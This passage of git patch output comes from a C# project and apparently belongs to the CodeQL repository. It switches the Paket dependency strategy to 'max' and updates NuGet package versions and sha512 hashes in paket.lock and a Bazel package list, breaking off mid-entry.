"netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.4": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.5": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.6": ["System.Runtime", "System.Runtime.Handles"], "netstandard2.0": ["System.Runtime", "System.Runtime.Handles"], "netstandard2.1": ["System.Runtime", "System.Runtime.Handles"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Windows.Extensions", "id": "System.Windows.Extensions", "version": "7.0.0", "sha512": "sha512-KNnH0GX7T/oRAzOtJjefboYngi+d/bNGd63j+ZIFFTIR8RM0dwptuImNXiKqvD78kzcWAf3kd3yjcih+UTYkbw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": ["System.Drawing.Common"], "net7.0": ["System.Drawing.Common"], "net8.0": ["System.Drawing.Common"], "net9.0": ["System.Drawing.Common"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit", "id": "xunit", "version": "2.9.2", "sha512": "sha512-bs4ccplaqCT7+jdAJhtt75uKq9qA3Jeld1ugiOgGEGSnzq8gkoa0VUqNEKkMPkBwV5COlAllNJGtGBfgxoZDrA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net20": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net30": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net35": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net40": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net403": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net45": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net451": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net452": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net46": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net461": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net462": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net47": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net471": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net472": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net48": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net5.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net6.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net7.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net8.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net9.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp1.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp1.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.2": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp3.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp3.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.2": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.3": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.4": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.5": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.6": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard2.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard2.1": ["xunit.core", "xunit.assert", "xunit.analyzers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.abstractions", "id": "xunit.abstractions", "version": "2.0.3", "sha512": "sha512-PKJri5f0qEQPFvgY6CZR9XG8JROlWSdC/ZYLkkDQuID++Egn+yWjB+Yf57AZ8U6GRlP7z33uDQ4/r5BZPer2JA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.analyzers", "id": "xunit.analyzers", "version": "1.16.0", "sha512": "sha512-65QLxnRoOqpAn2hMnjI1FLmQEjzUye2h4MwRVe1k151K+UFG1Ehr/s/MLwNJ6pCNoyoJjOoNuF7OGW4mH2bdaQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, From 4013eeba8b0319170b9a0bdbaf9334b37cf54399 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 11:37:03 +0100 Subject: [PATCH 0873/1267] C#: Use the newest version of packages instead of the minimum version. --- csharp/paket.dependencies | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/paket.dependencies b/csharp/paket.dependencies index 824e2d73a83..58829b5ec06 100644 --- a/csharp/paket.dependencies +++ b/csharp/paket.dependencies @@ -2,7 +2,7 @@ framework: net9.0 storage: none source https://api.nuget.org/v3/index.json # behave like nuget in choosing transitive dependency versions -strategy: min +strategy: max nuget Basic.CompilerLog.Util nuget Mono.Posix.NETStandard From 347fb1cfd9b75384427d72f35b56866df7cc522d Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 11:37:21 +0100 Subject: [PATCH 0874/1267] C#: Update dependencies. --- csharp/paket.lock | 96 +++++++++++++++++++++---------------------- csharp/paket.main.bzl | 56 ++++++++++++------------- 2 files changed, 75 insertions(+), 77 deletions(-) diff --git a/csharp/paket.lock b/csharp/paket.lock index b80defd8c43..8bfc5b1650e 100644 --- a/csharp/paket.lock +++ b/csharp/paket.lock @@ -1,5 +1,5 @@ STORAGE: NONE -STRATEGY: MIN +STRATEGY: MAX RESTRICTION: == net9.0 NUGET remote: https://api.nuget.org/v3/index.json @@ -12,11 +12,11 @@ NUGET MSBuild.StructuredLogger (>= 2.2.243) System.Buffers (>= 4.6) Humanizer.Core (2.14.1) - MessagePack (2.5.187) - MessagePack.Annotations (>= 2.5.187) + MessagePack (2.5.192) + MessagePack.Annotations (>= 2.5.192) Microsoft.NET.StringTools (>= 17.6.3) - MessagePack.Annotations (2.5.187) - Microsoft.Bcl.AsyncInterfaces (8.0) + MessagePack.Annotations (2.5.192) + Microsoft.Bcl.AsyncInterfaces (9.0) Microsoft.Build (17.12.6) Microsoft.Build.Framework (>= 17.12.6) Microsoft.NET.StringTools (>= 17.12.6) @@ -25,11 +25,11 @@ NUGET System.Reflection.Metadata (>= 8.0) System.Reflection.MetadataLoadContext (>= 8.0) Microsoft.Build.Framework (17.12.6) - Microsoft.Build.Utilities.Core (17.5) - Microsoft.Build.Framework (>= 17.5) - Microsoft.NET.StringTools (>= 17.5) - System.Collections.Immutable (>= 6.0) - System.Configuration.ConfigurationManager (>= 6.0) + Microsoft.Build.Utilities.Core (17.12.6) + Microsoft.Build.Framework (>= 17.12.6) + Microsoft.NET.StringTools (>= 17.12.6) + System.Collections.Immutable (>= 8.0) + System.Configuration.ConfigurationManager (>= 8.0) Microsoft.CodeAnalysis (4.12) Humanizer.Core (>= 2.14.1) Microsoft.Bcl.AsyncInterfaces (>= 8.0) @@ -47,7 +47,7 @@ NUGET System.Text.Encoding.CodePages (>= 7.0) System.Threading.Channels (>= 7.0) System.Threading.Tasks.Extensions (>= 4.5.4) - Microsoft.CodeAnalysis.Analyzers (3.3.4) + Microsoft.CodeAnalysis.Analyzers (3.11) Microsoft.CodeAnalysis.Common (4.12) Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) System.Collections.Immutable (>= 8.0) @@ -99,8 +99,8 @@ NUGET Microsoft.NET.Test.Sdk (17.12) Microsoft.CodeCoverage (>= 17.12) Microsoft.TestPlatform.TestHost (>= 17.12) - Microsoft.NETCore.Platforms (1.1.1) - Microsoft.NETCore.Targets (1.1.3) + Microsoft.NETCore.Platforms (7.0.4) + Microsoft.NETCore.Targets (5.0) Microsoft.TestPlatform.ObjectModel (17.12) System.Reflection.Metadata (>= 1.6) Microsoft.TestPlatform.TestHost (17.12) @@ -111,32 +111,33 @@ NUGET Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) Mono.Posix.NETStandard (1.0) - MSBuild.StructuredLogger (2.2.243) + MSBuild.StructuredLogger (2.2.386) Microsoft.Build.Framework (>= 17.5) Microsoft.Build.Utilities.Core (>= 17.5) + System.Collections.Immutable (>= 8.0) Newtonsoft.Json (13.0.3) System.Buffers (4.6) - System.Collections.Immutable (8.0) - System.Composition (8.0) - System.Composition.AttributedModel (>= 8.0) - System.Composition.Convention (>= 8.0) - System.Composition.Hosting (>= 8.0) - System.Composition.Runtime (>= 8.0) - System.Composition.TypedParts (>= 8.0) - System.Composition.AttributedModel (8.0) - System.Composition.Convention (8.0) - System.Composition.AttributedModel (>= 8.0) - System.Composition.Hosting (8.0) - System.Composition.Runtime (>= 8.0) - System.Composition.Runtime (8.0) - System.Composition.TypedParts (8.0) - System.Composition.AttributedModel (>= 8.0) - System.Composition.Hosting (>= 8.0) - System.Composition.Runtime (>= 8.0) - System.Configuration.ConfigurationManager (8.0) - System.Diagnostics.EventLog (>= 8.0) - System.Security.Cryptography.ProtectedData (>= 8.0) - System.Diagnostics.EventLog (8.0) + System.Collections.Immutable (9.0) + System.Composition (9.0) + System.Composition.AttributedModel (>= 9.0) + System.Composition.Convention (>= 9.0) + System.Composition.Hosting (>= 9.0) + System.Composition.Runtime (>= 9.0) + System.Composition.TypedParts (>= 9.0) + System.Composition.AttributedModel (9.0) + System.Composition.Convention (9.0) + System.Composition.AttributedModel (>= 9.0) + System.Composition.Hosting (9.0) + System.Composition.Runtime (>= 9.0) + System.Composition.Runtime (9.0) + System.Composition.TypedParts (9.0) + System.Composition.AttributedModel (>= 9.0) + System.Composition.Hosting (>= 9.0) + System.Composition.Runtime (>= 9.0) + System.Configuration.ConfigurationManager (9.0) + System.Diagnostics.EventLog (>= 9.0) + System.Security.Cryptography.ProtectedData (>= 9.0) + System.Diagnostics.EventLog (9.0) System.IO (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) @@ -154,41 +155,38 @@ NUGET System.Threading.Tasks (>= 4.3) System.IO.FileSystem.Primitives (4.3) System.Runtime (>= 4.3) - System.IO.Pipelines (8.0) - System.Memory (4.5.5) + System.IO.Pipelines (9.0) + System.Memory (4.6) System.Net.Primitives (4.3.1) Microsoft.NETCore.Platforms (>= 1.1.1) Microsoft.NETCore.Targets (>= 1.1.3) System.Runtime (>= 4.3.1) System.Runtime.Handles (>= 4.3) - System.Numerics.Vectors (4.5) - System.Reflection.Metadata (8.0) - System.Collections.Immutable (>= 8.0) - System.Reflection.MetadataLoadContext (8.0) - System.Collections.Immutable (>= 8.0) - System.Reflection.Metadata (>= 8.0) + System.Numerics.Vectors (4.6) + System.Reflection.Metadata (9.0) + System.Reflection.MetadataLoadContext (9.0) System.Runtime (4.3.1) Microsoft.NETCore.Platforms (>= 1.1.1) Microsoft.NETCore.Targets (>= 1.1.3) - System.Runtime.CompilerServices.Unsafe (6.0) + System.Runtime.CompilerServices.Unsafe (6.1) System.Runtime.Handles (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Security.Cryptography.ProtectedData (8.0) + System.Security.Cryptography.ProtectedData (9.0) System.Security.Principal (4.3) System.Runtime (>= 4.3) System.Text.Encoding (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Text.Encoding.CodePages (7.0) - System.Threading.Channels (7.0) + System.Text.Encoding.CodePages (9.0) + System.Threading.Channels (9.0) System.Threading.Tasks (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Threading.Tasks.Extensions (4.5.4) + System.Threading.Tasks.Extensions (4.6) System.Threading.ThreadPool (4.3) System.Runtime (>= 4.3) System.Runtime.Handles (>= 4.3) @@ -197,7 +195,7 @@ NUGET xunit.assert (>= 2.9.2) xunit.core (2.9.2) xunit.abstractions (2.0.3) - xunit.analyzers (1.16) + xunit.analyzers (1.17) xunit.assert (2.9.2) xunit.core (2.9.2) xunit.extensibility.core (2.9.2) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index 413bf68ddf3..fa79062ab44 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl @@ -9,14 +9,14 @@ def main(): packages = [ {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.3", "sha512": "sha512-hgu/4KttHz9bXOISmomz1uO4WidkXqBbSu4MjVgj3SeJ/bH4t+nkZ5qybpqpZJHf04hdXlyt/ux0OWv5/xEKRQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack", "id": "MessagePack", "version": "2.5.187", "sha512": "sha512-gZ6QLyipngHr+n/XWWm7TM26j9vkM6+B6RXBuv+ia/DjJsG6pJaQbVuz/+RBFJrSd98eTk+CqHwrE1DtFyR1bw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.187", "sha512": "sha512-1IThHnbMw6Ah9Mb/bZfWEwZDo3ZbsU9usGAOeCs/oPWsklrdxVDNZHjIg6myvjlQvL7oMhagEeb+07kjL410aQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "8.0.0", "sha512": "sha512-ecsHc9lEZZJM7k5HHZA1PV2N+ELEarLFcssV2bn7XQIJoaiNZDkplTNcX+VKANfDGURAuEyVFCcRu7aFy16VUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack", "id": "MessagePack", "version": "2.5.192", "sha512": "sha512-SnrwSQIKWfxcQvzE1TCUPvJ7A/44KFBDcmCc+YUDIq8QalCf0bGAjiBoAFewhJ81QuS5FsCNCOcKn+IURYlbAQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", 